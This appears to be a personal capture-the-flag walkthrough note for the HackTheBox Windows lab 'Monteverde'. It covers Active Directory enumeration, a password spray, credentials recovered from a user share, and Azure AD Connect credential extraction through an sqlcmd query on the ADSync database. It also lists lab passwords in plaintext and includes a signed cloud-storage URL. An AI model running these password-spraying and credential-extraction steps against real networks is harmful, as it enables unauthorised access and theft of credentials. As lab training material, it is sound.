HackTheBox · Lab
Monteverde

Monteverde

MediumWindowsActive DirectoryPassword Attacks

Monteverde.pdf

notes

NMAP

```shell
PORT      STATE SERVICE
53/tcp    open  domain
88/tcp    open  kerberos-sec
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
389/tcp   open  ldap
445/tcp   open  microsoft-ds
464/tcp   open  kpasswd5
593/tcp   open  http-rpc-epmap
636/tcp   open  ldapssl
3268/tcp  open  globalcatLDAP
3269/tcp  open  globalcatLDAPssl
5985/tcp  open  wsman
9389/tcp  open  adws
49667/tcp open  unknown
49673/tcp open  unknown
49674/tcp open  unknown
49676/tcp open  unknown
49693/tcp open  unknown
```

SMB

Anon Auth Success but null


Guest deactivated

LDAP

Anon Auth Success


Anon Users Enum


```shell
AAD_987d7f2f57d2 # 
AD Connect?

mhope
SABatchJobs # 
Batch Jobs?

svc-ata
svc-bexec
svc-netapp
dgalanos
roleary
smorgan
```


Windapsearch


    lets see who’s in `Remote Management Group`


    ```shell
    CN=Mike Hope,OU=London,OU=MegaBank Users,DC=MEGABANK,DC=LOCAL
    ```

Enum4linux

No account lockout

Password Spray

One hit


```shell
SABatchJobs:SABatchJobs
```

SMB AUTH w/ creds success

```shell
Share Permissions Remark
ーーーーーー ------
ADMIN$               Remote Admin
azure_uploads READ
C$                   Default share
E$                   Default share
IPC$          READ   Remote IPC
NETLOGON      READ   Logon server share
SYSVOL        READ   Logon server share
users$        READ
```


Found File


```shell
//10.10.10.172/users$/mhope/azure.xml
```


```shell
<Objs Version="1.1.0.1" xmlns="http://schemas.microsoft.com/powershell/2004/04">
  <Obj RefId="0">
    <TN RefId="0">
      <T>Microsoft.Azure.Commands.ActiveDirectory.PSADPasswordCredential</T>
      <T>System.Object</T>
    </TN>
    <ToString>Microsoft.Azure.Commands.ActiveDirectory.PSADPasswordCredential</ToString>
    <Props>
      <DT N="StartDate">2020-01-03T05:35:00.7562298-08:00</DT>
      <DT N="EndDate">2054-01-03T05:35:00.7562298-08:00</DT>
      <G N="KeyId">00000000-0000-0000-0000-000000000000</G>
      <S N="Password">4n0therD4y@n0th3r$</S>
    </Props>
  </Obj>
</Objs>
```


Password found!


```shell
4n0therD4y@n0th3r$
```


As it was found in mhope’s folder, let’s asume its his.


Success


```shell
[+] MEGABANK.LOCAL\mhope:4n0therD4y@n0th3r$ 
(Pwn3d!)
```

EVIL-WINRM as mhope

`mhope` is a member of `Azure Admins`


Also some interesting apps


According to Microsoft, the service responsible for syncing local AD to Azure AD is `ADSync`


Get-Proccess, tasklist results in access denied.


Invoking with PS also denied.


```shell
Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d-----         1/2/2020   9:36 PM                Common Files
d-----         1/2/2020   2:46 PM                internet explorer
d-----         1/2/2020   2:38 PM                Microsoft Analysis Services
d-----         1/2/2020   2:51 PM                Microsoft Azure Active Directory Connect
d-----         1/2/2020   3:37 PM                Microsoft Azure Active Directory Connect Upgrader
d-----         1/2/2020   3:02 PM                Microsoft Azure AD Connect Health Sync Agent
d-----         1/2/2020   2:53 PM                Microsoft Azure AD Sync
d-----         1/2/2020   2:38 PM                Microsoft SQL Server
```


Registry works tho:


```shell
Get-Item -Path HKLM:\SYSTEM\CurrentControlSet\Services\ADSync
```


And we can see an executable


```shell
ImagePath        : "C:\Program Files\Microsoft Azure AD Sync\Bin\miiserver.exe"
```


We can issue this to obtain file and product version


```shell
Get-ItemProperty -Path "C:\Program Files\Microsoft Azure AD Sync\Bin\miiserver.exe" | Format-list -Property * -Force
```


Let’s have a look at internal portsmaps


```shell
Active Connections
  Proto  Local Address          Foreign Address        State           PID      Offload State
  TCP    10.10.10.172:1433
```


MSSQL apparently


Let´s extract `$key_id` , `$instance_id` & `$entropy` from database manually.


```shell
C:\Program Files> sqlcmd -S MONTEVERDE -Q "use ADsync; select instance_id,keyset_id,entropy from mms_server_configuration"
Changed database context to 'ADSync'.
instance_id                          keyset_id   entropy
------------------------------------ ----------- ------------------------------------
1852B527-DD4F-4ECF-B541-EFCCBFF29E31           1 194EC2FC-F186-46CF-B44D-071EB61F49CD

(1 rows affected)
```


We can use:


[https://blog.xpnsec.com/azuread-connect-for-redteam/](https://blog.xpnsec.com/azuread-connect-for-redteam/)


for extraction of creds


![image.png](https://prod-files-secure.s3.us-west-2.amazonaws.com/25f83ed0-ddc8-8143-b578-00031f210370/eceb43c3-9443-44ab-82ba-504f15a518f2/image.png?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Content-Sha256=UNSIGNED-PAYLOAD&X-Amz-Credential=ASIAZI2LB4665I2WAL5I%2F20260309%2Fus-west-2%2Fs3%2Faws4_request&X-Amz-Date=20260309T082910Z&X-Amz-Expires=3600&X-Amz-Security-Token=IQoJb3JpZ2luX2VjEGAaCXVzLXdlc3QtMiJHMEUCIQClJVSRHAeTYmNIC79ZSk3%2B7sQpPSthXdCJrl7kb6mFrgIgC72yHYxn3KQk%2Bkc%2F23bSBNlEGeAjmDLjktUkGXhYoV4q%2FwMIKRAAGgw2Mzc0MjMxODM4MDUiDFvhf3IrUdEOuSFhaCrcA%2BNUwEAmZvaNXE8Vtv40d0cjetFA%2BrOKDii3Xni%2BpIuCIGDmKOp%2BWHDvB6TunlbXM6%2Fjssxpc0wKNaRHk9pnrRN16D8Jg84grTJ129uAhqzP9GANXVTMAF2gnyeYmuUpnN%2FEstPi8sIUW8zIw5Ai3%2BRgLiL0TJ0FDzhPM3T3IyAp4q8Ar%2BgmOglp7hu%2FUTQs2ZvThT%2BsydCYkWDTHnMFF0yd55gLllZacDZ04RGVIXtFxrIHxi9kElzUgdTLjB81UHSnXjGN8KnjLT9Jm26HBb92SP1kiILoI0EAyc4S%2BZKqv7hzwlst4JCrZ7CZDLTXNE7Xr%2Bedrg%2BLonKK98MxQgMmzHxYBcGPKh9Nwmcos2%2B63LCVxzwmdmVs0y0WgwpEyHWZmYp09SOVKtR4GKWLl8zgV1YGEqm2SYCbao0pbhEqiCr%2FxWvph2noe%2F7pEBEfqWwLF0PaCzf3Bjt%2BnhZ2kL5wj25PEuMbibmXBvxZTmQbA21xWGyhgwbLzlXZUzfFHCyboALKQcZuVumzsvWHvAg0Q8SGgQGhX5wva%2BK%2B6MJjrlk%2BHKBGfAkuGzrtkl2eqEP1lBEWWNqlz5I7S6dxqmtTStY3VZBzNc1Wf8w8NZmDhZsrXsApwb%2FClrCAMO7zuc0GOqUBwyaG67wcWZS2V%2BCOjrEoyk4UHPDEpqF1a6QSZ2efqgaKio%2BWuKriykdNMbyHBcxqlj4VOA9WfnHT3pFoeyMlnVcBl7THFW26wKxJa65zkwMA%2BhtfcV89UdJ3sr98OnS60qRD0cmyQXVPeqN7N8BBaNhC9XQA%2BuIwcCl5q8ZS2xWKyfU%2FXTEnLgUItECnehszgzZG2EE3oaxFla6%2FSJX2t9sCouGu&X-Amz-Signature=398372ff1e8c76b84e200de222e96b622c01b6beeaa77c7d0614216d2f4c05f5&X-Amz-SignedHeaders=host&x-amz-checksum-mode=ENABLED&x-id=GetObject)

image.png

Ippsec Notes

rpcclient

SMBmap

smbmap -u $USER -p $PASS -H $IP -R --exclude $SHARE,$SHARE

smbmap -u $USER -p $PASS -H $IP --download $SHARE/folder/file.txt

In windows shell

hostname; whoami; ipconfig

Seatbelt.exe ?

PowerUpSQL.ps1

XP_dirtree was vulnerarble in box. Get hash with responder / rabbithole tho

Scope

OS

Windows 10 / Server 2019 Build 17763 x64

FQDN / DOMAIN

MONTEVERDE.MEGABANK.LOCAL

Domain SID S-1-5-21-391775091-850290835-3566037492

Users

Administrator
Guest
krbtgt
AAD_987d7f2f57d2
mhope
SABatchJobs
svc-ata
svc-bexec
svc-netapp
dgalanos
roleary
smorgan

Credentials

SABatchJobs:SABatchJobs
mhope:4n0therD4y@n0th3r$
administrator:d0m@in4dminyeah!

NMAP

PORT      STATE SERVICE
53/tcp    open  domain
88/tcp    open  kerberos-sec
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
389/tcp   open  ldap
445/tcp   open  microsoft-ds
464/tcp   open  kpasswd5
593/tcp   open  http-rpc-epmap
636/tcp   open  ldapssl
3268/tcp  open  globalcatLDAP
3269/tcp  open  globalcatLDAPssl
5985/tcp  open  wsman
9389/tcp  open  adws
49667/tcp open  unknown
49673/tcp open  unknown
49674/tcp open  unknown
49676/tcp open  unknown
49693/tcp open  unknown

SMB Shares

Share Permissions Remark
ーーーーーー ------
ADMIN$               Remote Admin
azure_uploads READ
C$                   Default share
E$                   Default share
IPC$          READ   Remote IPC
NETLOGON      READ   Logon server share
SYSVOL        READ   Logon server share
users$        READ

Web Services Enumeration

Web Technology

[+] Nikto

[+] Wfuzz

Other Notes

Privilege Escalation

Takeaway Concepts

https://blog.xpnsec.com/azuread-connect-for-redteam/

Logs

file

file